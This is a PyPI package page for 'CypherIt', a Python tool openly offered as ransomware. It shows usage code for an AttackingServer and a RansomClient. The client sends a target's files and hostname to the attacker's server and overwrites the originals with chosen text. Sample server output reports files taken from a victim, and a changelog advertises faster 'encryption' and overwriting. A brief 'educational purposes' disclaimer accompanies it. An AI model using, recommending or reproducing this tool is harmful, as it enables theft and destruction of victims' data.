Skip to main content

Renames all files and writes it with what ever you want. For more information check out my website:https://pypi.org/project/CypherIt/

Project description

CypherIt

CypherIt is an intelligent tool which renames all the files to a txt file in a binder.You can write what ever you want.

All the files of the target will be saved in your directory and you can do what ever you want. The name of the directory is the targets hostname

Inspired by:

B.I.GG. He had this wonderful idea. BIG thanks to him

HOW DOES CYPHERIT WORK

If you are familiar to my style of packages. You already know how simple it is

First of all create a server:

Server

import CypherIt as ci

ip, port = "127.0.0.1", 1234

server = ci.AttackingServer(ip, port)
server.start()

Client

import CypherIt as ci

ip, port, path, text = "127.0.0.1", 1234, r"C:\\test", "ALI THE MASTER"
# You have to specify the path because this was just build for educational purposes. So please do not use it for bad thinks

data = ci.RansomClient(ip, port, path, text)
data.start()

Output of Server

Waiting for connection....
Connection has been established with ('192.168.0.73', 64328)
98_304 Bytes has been sent to the server
"_" stands for point
18 files have been saved to your directory
Waiting for connection....

You always have to run the server first and then the client.

The hostname of the target will be sent to your server

A Directory with the hostname of the target will be created.

All the data of target will be stored in that directory

Additional

  • PLEASE DO NOT HACK SOMEONE FOREIGN
  • If you see "Connection has been established" at the server than you have to wait a bit for the data to arrive

Change Log

0.0.1 (29/11/2022)

  • First Release

0.0.2 (29/11/2022)

  • Fix

0.0.3 (03/12/2022)

  • More intelligent
  • Accurate connection
  • Folder in path can also be written to a txt file
  • file in the path will be overwritten even folders in the path
  • Faster overwriting (ps. Still slow but I am working on it)
  • Path error fixed

0.0.4 (04/12/2022)

  • Better "encryption"
  • Better Server
  • MemoryError fixed
  • Capacity of bytes has been increased to 8kb
  • Python Package name fix

0.0.5 (07/12/2022)

  • Way faster encryption
  • Better Code
  • New function "all_data"

0.0.6 (10/12/2022)

  • New function "AI_check" this AI checks in every directory
  • New output
  • Bytes of target will be in the output
  • Change directory more accurate
  • Number of target files will be displayed at the output of the target

0.0.7 (06/01/2023)

  • File count error fixed on server

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

CypherIt-0.0.7.tar.gz (5.5 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page